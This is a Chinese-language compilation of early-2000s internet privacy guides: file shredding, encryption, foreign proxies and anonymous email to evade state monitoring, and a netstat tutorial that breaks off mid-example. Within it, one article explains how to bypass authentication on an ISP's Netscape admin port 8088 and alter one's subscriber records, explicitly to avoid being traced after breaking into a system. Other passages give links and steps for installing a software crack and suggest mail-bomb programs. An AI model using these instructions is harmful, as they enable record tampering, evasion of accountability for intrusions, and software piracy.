1 .网盾碎纸机功能：网盾软件安装时，还会自动提供一个“网盾碎纸机”的小程序，并将其快捷方式放到桌面上。网盾碎纸机和Windows的回收站的作用相似，但其删除文件的功能更强大，包括“正常删除”、“快速删除”和“彻底删除”三个选项，我们这里在选项中选择“彻底删除”选项，并且在“重写文件次数”中选择次数为5以上（NSA建议为7），次数越多安全性越高。使用方法是我们删除文件时在网盾主界面中选中文件或者目录，选择删除，这样即使使用recoverNT这样的专业恢复软件也无法恢复硬盘上已删除的文件。第二个方法更简单：首先打开“资源管理器”或“我的电脑”，然后用鼠标选中并单击要删除的文件或目录，最后将文件目录的图标拖到桌面上的“网盾碎纸机”的快捷方式图标中，单击“确定”即可。（注意不能用资源管理器中的删除方法或者直接按DeL键删除文档，这样可以用诺顿磁盘检测工具或者其它软件轻易恢复。）需要提醒大家的是：删除之后绝对无法恢复，请大家删除重要文档前三思。

2 .网盾基本加解密功能：有两种方法，一是安装完网盾后，可以在资源管理器中直接选择需要加密的文件或者文件夹，按鼠标右键，在弹出菜单中选择“加密”，然后输入两次八位以上密钥，（最好是字母与数字混合），即可完成加密；解密时双击已加密的文件，输入解密密钥，解密就完成了。第二种方法是登录网盾主界面，输入用户名和密码，然后创建密钥库，密钥库创建完毕后，在文件列表区或待加密文件区选中要加密的文件（目录），选择密钥库中的某一密钥（可手工输入或者随机生成），选择文件菜单命令“加密”命令或者点击鼠标右键选择弹出的菜单命令“加密”即可完成操作，这种方法的解密过程类似加密过程。如果网盾配合隐藏文件夹软件就可做到对磁盘文件保密天衣无缝。

3 对电子邮件的加密：类似PGP技术，只不过界面中文化，而且操作友好一些。它也是采用“公钥”、“私钥”的双密钥方式，提供数字信封、数字签名等强大功能，与Outlook Express完美结合，使用方便，值得推荐！这里顺便提醒一下国内学员，千万不要用国内提供的免费电子邮箱（163.net、netease.com等）来交流信息，而要使用国外的yahoo.com、hotmail.com等信箱，如果英文不好可使用台湾、新加坡、香港的雅虎信箱或者其它免费信箱，采取代理服务器+web浏览的方式阅读信件，发送信件时尽量使用附件并且对邮件进行加密。（参考以前刊登过的《如何安全使用电子信件》一文http://209.196.48.36/package/gb/0001/Sep/15/EmailSafety.html）

4 另外，网盾还提供定时加密、退出时自动加密（需设缺省密钥）、密钥管理等一些其他实用功能，这里附上一份网盾的说明书（word文档）和使用帮助，供参考。

7． 介绍The washer：简单易用的历史记录清除工具。先从ftp://member.myrice.com/czy/dl4/wwinstall.exe下载the washer 3.0 ，然后从http://czy.myrice.com/dl/TNT-WINDOW.WASHER.3.0_CRK.ZIP载破解文件（或者从http://astalavista.box.sk/以washer为关键词搜索破解程序），先安装the washer，然后打开TNT-WINDOW.WASHER.3.0_CRK.ZIP压缩包找到TNT-Window Washer 3.0 CRK.exe双击执行程序，解除三十天时间及功能限制。使用方法：先将standard washer items项中所有选项全部打勾，对于office2000 用户还需在custom washer items项中点击add添加一个名称叫office recent的作业，在clean files 项前打勾，点击select选择path为C:\WINDOWS\Application Data\Microsoft\Office\Recent\*.* 的内容，这样每次使用washer即可清除office2000中的历史记录。下面的六个选项推荐都打勾选中，其中add bleach to washer items（粉碎次数）的info项次数建议为5次以上（这样回收站里的文档同样无法恢复），automatic wash every（自动清理）建议为day（每天），大家可根据自己情况选择。每次使用只要点击wash now选项即可。以上各种软件配合使用效果更好。

8． 在网络中浏览网页、下载软件和收发电子邮件特别要注意防病毒与黑客。尤其在电子邮件病毒泛滥的今天，建议有条件的人在收到朋友的重要信件时先打电话询问一下是否给你发了信，带了几个附件。千万不要打开陌生人发来的电子邮件，尤其是奇怪的附件。大陆流行的黑客软件主要有冰河、捣蛋专家、BO、网络精灵等，相对于病毒来说，黑客程序尤其让人痛恨，别有目的的人可以通过这些黑客程序把你的计算机当做他自己的使用，可以抓取屏幕了解你正在作的工作，删除甚至格式化你的本地硬盘。对付黑客的工具软件主要有the cleaner(v3.1以上)、lockdown等，用它们定期扫描硬盘文件，配合blackice、天网防火墙（国产精品、推荐！）等防火墙软件，如果了解一些端口知识的话，可以在上网时用端口扫描工具扫描一下自己机器的端口，有没有特殊的端口开放。查杀病毒推荐使用趋势公司的pc－cillin2000/2001（http://czy.myrice.com/有下载），瑞星千禧版（一般国产品牌机上都有OEM），都带病毒防火墙功能。最后提醒大家的是要及时到各大软件下载基地下载最新病毒特征码、升级包等及时升级，这样才能防患于未然。

9． Realplayer的历史记录可用以下方法消除：先在 Realplayer的“view” →“preferences” →“general” →“recent clips”设为“1”，然后找一个无意义的ra文件，每次关机前打开它，覆盖一下历史记录信息。请有别的好办法的学员补充。

10． 因为现在大陆很多假的80和8080端口的代理服务器，所以大家在使用代理前要用追捕（1.62版以上，www.zhuibu.com可供下载）查看一下代理的IP地址是否在国内，或者是否未被使用。这里推荐大家使用sock5代理，这样的代理目前似乎还无法假冒。如有需要可另文专述或请有经验的学员补充。

注：附上网盾说明书功参考（共三个文档）。The washer 若无法破解，可致信arm9981@yahoo.com 索要the washer 安装程序（约1.08M）和washer.exe破解后的程序（压缩后约376Kb），覆盖原安装路径同名文件即可。


关于上网安全的若干问题

目前，安全部门对网络的监控主要有如下几个方面：

1、追踪用户的IP。
这里的IP是指IP地址，也是上网用户的唯一身份说明。由它可获得用户的上网电话及其他资料。这样，安全部门一旦掌握你上网的IP，就非常容易查到你了。要避免暴露自己的IP，我们可使用安全的、可保密的代理服务器。

2、利用COOKIE。
安全部门另外一种常用的监控手段是利用上网用户电脑中的COOKIE。所谓Cookie就是当你在网上登记注册、或登录某些网页、或浏览某些网页时，网络管理人员或其他人员在你的电脑里“植入”
的一段小代码，它记录了你的电脑的配置、上网浏览的习惯及其相关他资料。因此，一旦安全部门通过某些方法掌握到了你上网时电脑的Cookie，也就很容易查到你了。要对付Cookie，可有三种办法：一是干脆禁止，这可以通过设置浏览器的安全程度来实现；二是定期删除之，这可以找一些软件来做，如：“优化大师”或“超级兔子魔法设置”等，或者干脆手工删去电脑中相应目录中（一般在\windows\cookies目录中，也有些情况IE在“Temporary Internet Files”中，Netscape在中）的所有Cookie；三是可到网上下载一些专门管理、禁止Cookie的小软件。

3、利用ActiveX和Java等代码。
除Cookie之外，网上有一些网页本身包含了一些不安全的ActiveX和Java等代码，当你访问这些网页时，网站管理者也可以获得有关你电脑的更多信息，由此不难确定你的身份（比如通过你在安装Win98时的注册名等等）！要防止这种情况发生，也可以采取前面所说的通过设置浏览器的安全程度来实现。

4、监控EMAIL。
对用户的EMAIL进行网络监控主要有两种方法：
①采用一些过滤软件，对信箱的来信的发件人，收件人，标题等字符串进行过滤，这种过滤主要是针对一些特定目标来进行的，如针对国外一些著名组织或一些重要信箱等，所以，如果你用自己国内的或已暴露的信箱贸然与国外的某个知名组织的公开信箱或其他重要信箱联系，便有可能被监控到。
②直接抽查用户信箱。本来各ISP商的网络管理员使用超级帐号就可以看到所有用户的信箱内容。但是，公安仍然信不过这种检查，一般网络管理员也没有耐心去做这种无聊的事，所以从９８年起，各地公安陆续开始安装直接可以偷看所有本地用户信箱的程序。这当然是严重侵犯公民隐私和基本人权的违法行径。而对于那些难以一一察看的、面向全世界而不属于本地的免费信箱（如：www.163.net），国内公安虽然不可能一一察看，但却可冒天下之大不韪，必要时将免费信箱网站强行封闭。去年七月就采取了这种空前的封锁行为，首都热线的263，广州电信的163，北京网易的yeah.net等中国最大的一批免费邮件服务站点被公安部门强迫关闭了几天。

5、此外，安全部门从理论上说可能会在你的电脑里植入“特洛伊木马”（实际上为一种病毒）（虽然这种机会不多），一旦他们成功，你的电脑就相当于完全透明！因此也要养成定期清扫电脑病毒的习惯。
针对以上各种监控方法，我们可采取如下几种办法避免被监控到，从而在网上安全活动。

一、设置好浏览器的安全程度：

1、 IE设置：打开：tools（工具）栏，选Internet Options (Internet选项)，

(1)选“safe”（安全）项，点“自定义级别”，在Cookies选项中，在“允许使用存储在你计算机中的Cookies”中，选中“禁用”；在“允许使用每个对话Cookies（未存储）”中，选“提示”，这主要是方便以后碰到来历不明的人使用对话Cookies时，可选“否”，以不让其使用。在“用户验证”中，“登录”选“匿名登录”。
(2)选“高级”，在“安全”中，可将所有的选项打勾。
(3)选“常规”，在“历史纪录”中，“网页保存在历史纪录中的天数”选0天。

2、 Netscape4.03、4.05中文版设置：

(1)选“导航器”菜单，选“工具”选项，点“安全信息”，①点“导航器”，将所有的选项打勾。②打开“口令”，点“设置口令”，设置自己的口令或密码。③可根据需要，设置证书等其他选项。
(2)选“编辑”菜单，选“首选项”，在左框中：①点Advance（高级），在右边的选项方框中，打上所有的勾；在Cookie中，选“禁用Cookie”；②点：“漫游服务”，选“项目选择”，取消“Cookie”、“历史纪录”的勾号。

二、使用代理服务器ＰＲＯＸＹ

1、查找代理服务器。
我们可用“代理猎手”或其他搜索软件在上网的时候搜索。不过搜索得到的代理服务器一是必须是国外的，二是还必须检验其安全性。这里提供一些国内和国外的地址段：
202.118.208.0— 202.127.204.255 国内
202.128.00.0— 202.128.095.255 关岛
202.130.00.0— 202.130.249.255 国内
202.131.00.0— 202.136.127.255 国外
202.136.254.0— 202.136.255.255 国内
202.137.00.0— 202.191.255.255 国外
202.192.00.0— 202.207.255.255 国内
等等。在设置代理猎手搜索时应在国外的地址段中选择。当然，上述地址段内有些小段可能还会有些出入。注意选用的代理服务器还必须是免费（free）且速度较快。

（1）关于搜索到的免费代理服务器的具体地址，我们可用“追捕Wry”或“Whois”等软件进行检验，以确定其具体地址到底是在国内还是在国外。例如，我们先用代理猎手在地址段202.137.000.000——202.191.255.255进行搜索，得部分代理地址，然后再用“追捕”检验，部分结果如下：
202.141.24.20:8080@HTTP$6&2692,11596,11651#印度
202.143.135.7:8080@HTTP$6&460,3768,3788#亚洲
202.143.157.10:8080@HTTP$6&3444,13086,13114#亚洲
202.144.24.6:8080@HTTP$6&1328,4813,4867#印度
202.144.24.251:8080@HTTP$6&1476,15371,15371#印度
202.144.25.6:8080@HTTP$6&1376,13112,13126#印度
202.144.29.131:8080@HTTP$6&1338,5883,6458#印度
202.144.29.135:8080@HTTP$6&1351,5917,6477#印度
202.144.54.26:8080@HTTP$6&2029,12216,12696#印度
202.144.129.36:8080@HTTP$6&1471,9227,9840#不丹
202.145.33.118:8080@HTTP$6&323,3185,3636#台湾
202.145.90.222:8080@HTTP$6&850,3520,3520#台湾
202.145.123.130:8080@HTTP$6&3238,5301,10005#台湾
202.145.123.131:8080@HTTP$6&275,5621,7042#台湾
202.145.123.139:8080@HTTP$6&989,3297,10275#台湾
202.145.123.140:8080@HTTP$6&1051,6341,6341#台湾
202.145.123.141:8080@HTTP$6&915,3288,7591#台湾
202.145.123.145:8080@HTTP$6&3212,9765,11622#台湾
202.145.123.147:8080@HTTP$6&3605,8475,9807#台湾
202.145.127.18:8080@HTTP$6&181,4076,4076#台湾
202.145.161.65:80#台湾
这里要特别注意名为“亚洲”的代理地址，如不能另行确定，还是不用为好，以免为国内地址。

（2）关于搜索到的免费代理服务器的安全性。一般情况下，ＰＲＯＸＹ都可对外隐藏你的IP，但是如果有人刻意（如在论坛上）安装一个小程序，还是能取到你的上网ＩＰ，只有少数PROXY能将你的ＩＰ完全保密。故检验代理服务器的安全性非常重要。我们可用该代理服务器上到一个代理服务器论坛http://cachenow.virtualave.net/forum/index.html ，用其中的代理服务器检测工具进行检测，如果所有的CGI环境变量都没有包括自己的IP地址，则该代理服务器就是安全的。例如：我们对前面搜索到的代理地址202.145.161.65：80进行验证，结果如下：
CGI Environment Variables（CGI环境变量）
HTTP_VIA=1.0 ACC_SERVER
DATE_GMT=Tuesday, 18-Jul-2000 16:25:54 GMT
DATE_LOCAL=Tuesday, 18-Jul-2000 09:25:54 PDT
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-comet, */*
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=cache.virtualave.net
HTTP_REFERER=http://cachenow.virtualave.net/forum/index.html
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
LAST_MODIFIED=Friday, 05-May-2000 00:41:12 PDT
QUERY_STRING=
REMOTE_ADDR=202.145.161.65
REMOTE_HOST=
REMOTE_PORT=3766
REQUEST_METHOD=GET
REQUEST_URI=/env.html
USER_NAME=daili
GET or POST_DATA=[]
上面所有的环境变量都没有包括本地IP地址。特别注意环境变量REMOTE_ADDR=202.145.161.65，即远端地址仍是代理服务器地址。故代理地址202.145.161.65还是比较安全的。

当然，这样的安全代理只能说明它可以对外隐藏你的IP，却不能完全说明它本身就是安全的。因为仅凭这些我们还是没办法知道该网站本身是否就是黑客开设的或它本身是否就在搜集你的IP及其它资料。所以，一般我们应尽量使用那些大家常用、比较公开化的、有较好信誉的那些免费代理服务器，而且一个代理服务器也不要使用太长时间，要经常更换。另外，需要注意的是，许多免费代理服务器由于种种原因隔一段时间会自行关闭或不再免费，因而会出现再不能连通的情况，此时就应更换代理服务器。

获取代理服务器还有一个方法，就是经常浏览一些代理服务器的网页或论坛，从中得到另外一些代理服务器，特别是得到一些可以自动设置的、安全性较高的代理服务器。例如，浏览www.spaceproxy.com时，就可得到可以自动设置的代理服务器地址：http://www.spaceproxy.com/proxy.pac，到时可在浏览器代理服务器的设置栏内——自动设置代理（Automatic proxy configuration）的地址栏中填入该地址即可。采用这种方法设置的代理服务器安全性也较高，建议大家首选。

2、设置代理服务器。
（1）普通代理服务器的设置：下面以202.145.161.65这个Proxy为例, 说明如何在浏览其中设定普通代理服务器Proxy。
①Netscape4.0以下版本的设置: 打开“Options（选项）”菜单，选“Network Preferences（网络首选）”，选择“Manual Proxy Configuration（手工设置代理）”，并按下View（察看），在 FTP/Gopher/HTTP Proxy: 中填上202.145.161.65，在相应的 Port：（端口)填上80。最后按“OK确定”退出。

②Internet Explorer 3.0(中文)设置:选“检视”，选“选项”，选“连线”，在“透过Proxy 服务器连线到Internet”上打勾并按下“设定值” 按钮，分别在 HTTP/FTP/Gopher 的Proxy 位址填上202.145.161.65，并在“连接埠”中填上80。最后按“确定”退出。

③Netscape 4.0x版本的设置：选择“EDIT（编辑）”菜单，选择“Preferences（首选项）”，在左框中选择“Advanced（高级）”，选择“Proxies（代理）”，选择“Manual proxy configuration（手工配置代理）”，打开“View（察看）”，除socks栏外，其余栏中都可填入202.145.161.65，在Port（端口）中填入80，按Ok（确定）键退出。如果要取消使用代理服务器，只须选择Direct connection to the Internet（直接连接到Internet）即可。

④IE（Internet Explorer）4.0以上中文版本的设置：选“工具”菜单，选“Internet选项”，点“连接”，如果是拨号上网，就点拨号设置旁边的“设置”（如果是局域网，就点下面的“局域网设置”）；如是手动设置，就在“代理服务器”下的“使用代理服务器”前面的方框中打勾（如果是自动设置，就在自动配置下面“自动检测设置(A)”和“使用自动配置脚本(S)”前面的方框中打上勾，并在地址栏内填入自动设置的代理服务器地址），并在下面的地址空栏内填上202.145.161.65，在端口栏内填上80；点“高级”，在最上面一栏Http(H)内，填入202.145.161.65，并在Port（端口）中填入80，然后，在下面“对所有协议均使用相同的代理(U)”前的方框中打上勾。最后按“确定”退出。

（2）使用二次(多重)代理服务器。即在浏览器中设置一般安全代理服务器之后，打开以下其中的一个网页（也可将其设为主页，以便每次打开浏览器时自动打开这些网页），并在网页提示处（Surf后面的框中）输入所要浏览的地址或直接使用下面提供的方法，这样可获得进一步的安全保护，加大安全系数。可用作二次（多重）代理的服务器地址如下：
①http://www.siegesoft.com/
CGI代理，需要在页面填入要去的网站地址。可提供SSL加密，速度也不错，可作二次代理首选。
②http://www.noproxy.com/
速度不错，自动选择提供一个CGI代理服务器，提供url加密，需要在页面填入要去的网站地址。
③http://www.mokichi.com/
一个日本网站，速度不错，使用方法：
http://www.mokichi.com/test/nph-proxy.cgi/000/http/你要去的网站地址
④http://www.rewebber.com/
提供三个网址，其中有SSL加密(！)，要求打开JavaScript选项：
https://www.rewebber.de/surf_encoded/http://你要去的网站地址
http://www.rewebber.de/surf_encoded/http://你要去的网站地址
http://www.rewebber.com/surf_encoded/http://你要去的网站地址
⑤http://www.anonymizer.com/
速度有延迟，使用方法：
http://invis.free.anonymizer.com/http://你要去的网站地址
http://anon.free.anonymizer.com/http://你要去的网站地址
http://anon-regulus.free.anonymizer.com/http://你要去的网站地址
⑥http://proxy.spaceproxy.com/

速度不错，提供的服务比较完善。
使用方法：http://proxy.spaceproxy.com/-_-http://你要去的网站地址
也可将上述的网址添加到“收藏夹(IE)”或“书签(Netscape)”中，以便需要时在一般安全代理的基础上直接点击这些网址就可以了。

当然，我们还可以在上述二次（多重）代理后再填上一个二次代理地址，这样就可得到三次代理服务了。如在使用普通安全代理（浏览器中设置）的基础上，再使用：http://www.rewebber.com/surf_encoded/http://www.spaceproxy.com（已检验可行），并在框中填入所要去的网址即可。当然，并不是每一种配对都可行，网友不妨多试一试。也有网友将单独使用上述提到的二次代理服务器（如：http://proxy.spaceproxy.com/-_-http://你要去的网站地址）叫做二次代理服务，将使用“普通安全代理+一般二次代理服务器”叫做三次代理服务，如果是这样的话，我们上面所说的三次代理服务就应该叫做“四次代理服务”了。

注意：从理论上说，即使选择了绝对安全的代理服务器，安全部门还是可以通过直接分析你上网数据流的方式找到你发表文章的证据，因为现在MODEM上的数据流还是可以被监控、拦载。尤其对那些已经上了安全部门“黑名单”的网友来说，你们用常用的上网电话肯定已被监控，只要你一拨号上网，安全部门就可以从ISP处得知然后全程跟踪，那时你的电脑同外界每一次通讯的数据纪录就会被记录在案并分析出具体内容。当然，被这样监控的人全国也不会有多少个。若是此种情况，则最好是到外面的网吧上网，当然，仍要使用上述的安全代理方法。另外，安全部门也会有意识地监控一些海外代理服务器，只要你访问这个代理服务器，安全部门就会马上从ISP处查找、记录下你的上网电话然后跟踪。要防止自己的上网数据被跟踪、被记录，最好的办法是要保证你的电脑同ISP间的数据通讯被全程加密！其实加密的办法很简单，上面给出的使用“普通安全代理+二次（多重）代理”的代理方法多数就可以获得这样的加密服务，这在其网页上会有说明。如果是用加密方法访问其他站点则会看到浏览器下面会出现一把锁的图案，此时你的电脑和访问站点间的通讯就完全是SSL或URL加密的，这种加密即使安全部门也无法解密。使用这样的代理上网方法，就不用担心电脑被24小时“监听”了。不过，这样加密后，会有较大的局限性，许多站点就可能再不能浏览了，特别是不能上贴了，但为了安全还是值得的。而且，也要注意并不是每一个普通安全代理都能与某个二次（多重）代理成功配合使用（有时需要“刷新”或“重装入”几次）。
前面提到的普通安全代理http://www.spaceproxy.com/proxy.pac（自动代理配置）、202.145.161.65：80（手工代理设置）与二次（多重）代理http://www.noproxy.com/、http://www.rewebber.com/、http://www.siegesoft.com/等可成功配对使用，其他配对使用的情况大家可多试一试。

三、安全使用ＥＭＡＩＬ

由前面所述对EMAIL的监控方法可知，使用EMAIL最安全的办法，还是使用国外免费信箱。国外免费信箱收信有两种用法，一种是用自动转信，将所有的信转回国内的信箱收看，这样的办法其实还是不安全，虽然你对外界隐藏了你的身份，但是，安全部门还可能在国内信箱上守株待兔找到你。所以，最安全的办法还是直接在国外免费信箱上用POP3方式收信。这样的收信速度比较慢，但为了安全，也只好忍受。POP3收信也有两种，一种是将信从你的旧信箱收到ＷＥＢ上看，这样在线时间长；另一种是将国外的信件用POP3方式收回你的邮件程序里看，就是我们常用的收信办法。建议还是采用直接用POP3方式在WEB上收发信件的方式，这是因为，首先一般邮件程序的设置比较麻烦，其次并不是每一种邮件程序都安全，有些邮件程序收发信件时并不能隐藏IP。

有关免费POP3方式收信，我们可以用POP3和free?mail这些关健字串在
http://www.yahoo.com/
http://guide.infoseek.com/
http://www.lycos.com/
这些搜索引擎上查找。下面是一些搜索到的POP3国外免费信箱：
http://www.netfreebies.net/free/email.shtml
http://www.1netcentral.com/free_email_directory.html
http://www.asiancityweb.com/network-c.html
免费信箱还有一种转信功能，也是有用的。例如，在你给国外发信时，不直接往其公开信箱投信，而是先申请一个国外的免费转信的信箱，并将这个信箱的转信地址设成所要投递的信箱，然后将所要发的信发往自己申请的这个信箱，信就自动会转给所要投递的信箱。由于免费信箱是在国外再转给刊物信箱，所有的国外路由国内公安都不可控制到，所以安全性大大提高。当然国外刊物要注意回信时不要引用来信者的原文。有关免费转信，可以用上面那些搜索引擎找关键词。以下是在www.yahoo.com上用free?forwarding（免费转信）作查询字串所查出的一少部份免费转信网站。我们可先在这些网站上申请一个免费信箱：
http://www.callsign.net/
http://www.elvismail.com/
http://www.findmemail.com/
http://www.graybook.com/
http://www.iname.com/
http://www.mailzone.com/
http://www.navy.org/
http://www.army.net/
http://www.netforward.com/
http://www.usaf.org/
不过，上述电子邮件使用方法还是不够不安全，因为邮件里会含有你的真实上网IP，万一收信人如果是个公安或被公安查到，即使是用免费信箱，即使你用了国外的SMTP，也仍会暴露你的本地上网IP。那么，怎样才能在EMAIL中避免暴露自己的IP呢？有三种办法：

1、使用有加密功能的、可用WEB方式发信的免费信箱。例如http://netaddress.usa.net/。先在该邮局申请一个免费邮箱，然后使用“普通安全代理+二次（多重）代理”的方式连接到该网页：http://netaddress.usa.net/，再登陆进入自己的邮箱，在左框中点“Write Mail”（撰写信件）（有的网页也用Compose表示“撰写邮件”），在“TO”后面的框中填上要发往的邮箱地址，在“Subject”（主题）后的框中填入信件的主题（也可不填），在最下面的大框中即时编写信件，或将编写好的信件内容复制到框中，最后，点击“Send Mail”（发信），就可将写好的信件发出去了。这里要注意的是：①并不是每一个可用WEB方式发信的免费信箱都能隐藏IP，如
www.hotmail.com和www.yahoo.com等，就不能隐藏IP。②有些可用WEB方式发隐藏IP的免费信箱的网页并不能用“普通安全代理+二次（多重）代理”的方式连接，可能要多试一试。③使用这种方式发信，先要申请一个邮箱，并要填写一些其他相关资料，有一点麻烦。

2、使用匿名邮件程序，如www.anonymizer.com。具体使用方法如下：先用普通安全代理方式连接到该网页，在其主页上点击“Services”（服务），再点击“Email”（邮件）或“Anonymizer Email”（匿名邮件），注意此时出现的网页还不是安全状态，浏览器的下端还未出现一把锁的图案；此时网页下端“TO： ”上面有一句话“This form is insecure. This means that someone can monitor your connection to Anonymizer. Click HERE to use the secure form.”，此时应该再点击“HERE”。进入下一网页后，浏览器的下端会出现一把锁的图案，这说明已进入安全连接状态了，此时我们就可以在TO：后面框中填入对方的收信地址；在“Subject”（主题）后的框中填入信件的主题（也可不填），在最下面“Message”（信件内容）下的大框中即时编写信件，或将编写好的信件内容复制到框中；最后，点击“Send Anonymously”（发匿名信），就可将写好的信件匿名发出去了。注意：①这种发信方式简单、易用，无需申请邮箱，也非常安全，建议首选使用。②这样发出的匿名信，一般对方要一、二天后才能收到；③关于匿名邮件程序，我们可以用关键词“anonymous?email”在搜索引擎或者下载站点搜索、查找。例如我们可用这种方法查到其他一些匿名邮件程序网址：
www.loveemail.com、www.worldsinglenetwork.com、www.trafficgems.com等。不过，有些还需要填一些资料、申请一个免费邮箱，有些可能不是免费的，大家有时间的话不妨多式一试。

3、使用邮件炸弹程序，将其中的转发信设置打勾后，就可隐去你的上网IP，当然，邮件炸弹程序使用时要将发信量设为“1”，否则那就真成了炸弹了。这些程序，也可以用“ghostmail”；“emailbomb”等关键词在搜索引擎或者下载站点查找，非常多。不过，使用前，一定要先给自已发一封信做试验，看看ＩＰ是不是真的隐去了。

总而言之，要做到安全上网活动，我们必须注意到如下几点：
1、设置好自己的浏览器。主要是将安全程度设置到较高状态。如禁止Cookie、ActiveX、Java，匿名上网，不让浏览器保留历史纪录，清除书签或收藏夹不该保留的网址等。

2、使用代理服务器上网，且最好是使用“普通安全代理+二次（多重）代理”的方式。在这种方式下，如是一般浏览，可不必使用SSL、URL加密方式，只使用一般普通安全代理或一般二次（多重）代理即可；但如果是在论坛或BBS上发表言论或文章，则一定要使用上述加密方式。若是使用这种加密方式不能上到某些论坛或BBS，则就不应发表言论。

3、收取EMAIL，应使用“普通安全代理+二次（多重）代理+WEB方式免费信箱”的方法；发送EMAIL则既可采取“普通安全代理+二次（多重）代理+WEB方式免费信箱”的方法，也可采取“普通安全代理+匿名邮件程序”的方法。

4、平时也应养成注意安全的好习惯。如不要在电脑中存放敏感性的文章和图像；及时清空浏览器的临时文件夹和浏览历史文件夹；在论坛或BBS上发表言论或文章时，要注意自己的笔名、信息、密码、风格等，切不要与平时的真实身份有任何联系！


如何编辑ISP帐号的详细信息

如何编辑ISP帐号的详细信息

By catsun@cners.com

虽然我们不支持网络犯罪，但如果你进入了一个系统并造成破坏，你的IP就会被记载在网站日志里，这样受害者网站的管理员可以由你的IP找到你的ISP，他会想你的ISP索要你的信息资料，然后你就麻烦大了。现在，不必担心，你可以编辑你ISP数据库的信息，把你的信息改成其他或错误的。这篇文章教你怎样做这些事，你将很容易的改变你在ISP数据库中的电话号码，名字，地址等信息。
注意：此教程仅适合装有Netscape企业版，并开放8088端口的系统。有可能适应或不适应其他系统。
8088端口通常运行Netscape服务器管理程序，它用来使管理员查看，编辑不同用户的详细信息，这个程序很实用，但也易被乱用，它可以使你改变你的信息。
Ok,怎样去知道我的ISP有没有这个漏洞呢？你可以用扫描器去扫描8088端口是否开放，常常是开放的，8088端口意味着我们有可能功。
我曾经的ISP有此漏洞，下一部是在浏览器地址栏里输入：

http://www.MyISP.net:8088 /

大家对后面的“：8088”都还理解吧，比如你打入www.163.com，浏览器默认连接163.com的80端口的Web服务，和你打入“www.163.com:80”的效果是一样的；如果您打入ftp://，浏览器将连接21端口；你也可以连接79端口
httP//www.cners.com:79。Get it?
回到我们的话题，如果你连接到目标的8088端口，你可能得到的信息是目标机器的名字，并被询问用户名和密码：

Site: MyISP.com
Realm: Netscape Administration
Username:
Password:

我们不用理会这些，只去按OK，我们会进入另外一个http验证页面，和上个页面相似，但有一处不同：Realm项。

Site: MyISP.com
Realm: Unknown Prompt
Username:
Password:

开始我们被询问管理员的帐号和密码，但现在域已经改变为'Unknown'所以我们可以输入自己的帐号和密码，你将进入'Netscape Server Account' 页面。这里，你可以改变你的所有注册信息，名字，密码...

说明：希望您感到这篇Page有些用处，但要看你自己的ISP配置，再次说一下，不要入侵国内的网络，本文仅供教学使用。

By catsun www.cners.com

您要转载请标明出处，www.cners.com视窗安全，谢谢！


如何使用netstat(tc)命令检查接口,IP,是否被安装了木马程序

如何使用netstat(tc)命令检查接口,IP,是否被安装了木马程序

朋友们常会问着样的问题，怎样查别人的IP？怎样查自己的IP呢？我系统的哪些段口是开的？我怎样知道我的系统是否被安装了木马程序？

其实这些问题（还有一些相似的问题）有一个简单的答案：Netstat命令!

微软公司故意将这个功能强大的命令隐藏起来是因为它对于普通用户来说有些复杂。

Netstat可以在MSDOS命令窗口下打开。

C:windows

C:>

大多数Windows用户的默认目录是Windows目录，如果不是，上面的命令将打开Windows目录。

好，在我们继续之前，我们要先知道Netstat是到底用来做什么的，它可以用来获得你的系统网络连接的信息（使用的端口，在使用的协议等 ），收到和发出的数据，被连接的远程系统的端口，Netstat在内存中读取所有的网络信息。

在Internet RFC标准中，Netstat的定义是：
「Netstat是在内核中访问网络及相关信息的程序，它能提供TCP连接，TCP和UDP监听，进程内存管理的相关报告」。

netstat参数
-----------------------------------------------------------
-A 显示任何关联的协议控制块的地址。主要用于调试
-a 显示所有套接字的状态。在一般情况下不显示与服务器进程相关联
的套接字
-i 显示自动配置接口的状态。那些在系统初始引导后配置的接口状态
不在输出之列
-m 打印网络存储器的使用情况
-n 打印实际地址，而不是对地址的解释或者显示主机，网络名之类的
符号
-r 打印路由选择表
-f address -family对于给出名字的地址簇打印统计数字和控制块
信息。到目前为止，唯一支持的地址簇是inet
-I interface 只打印给出名字的接口状态
-p protocol-name 只打印给出名字的协议的统计数字和协议控制块
信息
-s 打印每个协议的统计数字
-t 在输出显示中用时间信息代替队列长度信息。

netstat命令的列标题
Name 接口的名字
Mtu 接口的最大传输单位
Net/Dest 接口所在的网络
Address 接口的IP地址
Ipkts 接收到的数据包数目
Ierrs 接收到时已损坏的数据包数目
Opkts 发送的数据包数目
Oeers 发送时已损坏的数据包数目
Collisions 由这个接口所记录的网络冲突数目
---------------------------------------------------------

现在我们在对Netstat有了一定的了解之后就可以来使用它了，如果你打开了DOS窗口，你可以用以下命令来获取有关Netstat的帮助信息。

C:>netstat /?

-a Displays all connections and listening ports. (Server-side connections are normally not shown).

-e Displays Ethernet statistics. This may be combined with the -s option.

-n Displays addresses and port numbers in numerical form.

-p proto Shows connections for the protocol specified by proto; proto may be tcp or udp. If used with the -s option to display per-protocol statistics, proto may be tcp, udp, or ip.

-r Displays the contents of the routing table.

-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p

option may be used to specify a subset of the default.interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the
current configuration information once.

以上的信息仅仅是个参考，对于好奇心很强的您来说，是远远不够的。

那好，让我们试试每个命令并查看结果，用来理解当我们执行命令后发生了什么，显示出的信息是什么意思？

首先，我们使用Netstat的-a参数命令。

-a参数用来显示在本地机器上的外部连接，它也显示我们远程所连接的系统，本地和远程系统连接时使用的端口，和本地和远程系统连接的状态。（type and state）

例子：

C:>netstat -a

Active Connections
Proto Local Address Foreign Address State
TCP ankit:1031 dwarfie.box.com:ftp ESTABLISHED
TCP ankit:1036 dwarfie.box.com:ftp-data TIME_WAIT
TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2
TCP ankit:1045 mail2.mtnl.net.in:pop3 TIME_WAIT
TCP ankit:1052 zztop.box.com:80 ESTABLISHED
TCP ankit:1053 mail2.mtnl.net.in:pop3 TIME_WAIT
UDP ankit:1025 *:*
UDP ankit:nbdatagram *:*

我们有其中一行来讲解：

